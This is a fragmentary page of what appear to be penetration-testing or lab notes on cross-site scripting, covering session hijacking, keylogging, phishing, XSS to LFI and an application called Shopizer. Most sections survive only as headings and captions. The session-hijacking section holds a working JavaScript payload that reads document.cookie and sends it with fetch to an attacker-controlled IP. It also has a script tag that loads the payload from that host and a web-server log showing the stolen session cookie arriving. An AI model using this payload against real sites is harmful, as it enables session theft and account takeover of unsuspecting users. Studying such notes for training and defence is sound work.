Exploitation
Session Hijacking
// save the value of the cookie in a variable
let cookie = document.cookie
// URL-encode the variable
let encodedCookie = encodeURIComponent(cookie)
// make a GET request to our attacker machine exfiltrating the cookie
fetch("http://192.168.45.214/exfil?data=" + encodedCookie)<script src="http://192.168.45.214/xss.js"></script>$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.198.101 - - [05/Aug/2024 12:07:13] "GET /xss.js HTTP/1.1" 200 -
192.168.198.101 - - [05/Aug/2024 12:07:13] code 404, message File not found
192.168.198.101 - - [05/Aug/2024 12:07:13] "GET /exfil?data=session%3DSomeExampleCookie HTTP/1.1" 404 -Stealing Local Secrets
Type
Description
Accessed by
Keylogging
Stealing Saved Passwords

Phishing Users


Phishing Users (2)

login.html file.
list.js code.
XSS to LFI



Shopizer
Recon



Payload Creation

resources folder.



Error message.
Error message.Exploitation


updateAddress POST request.
Last updated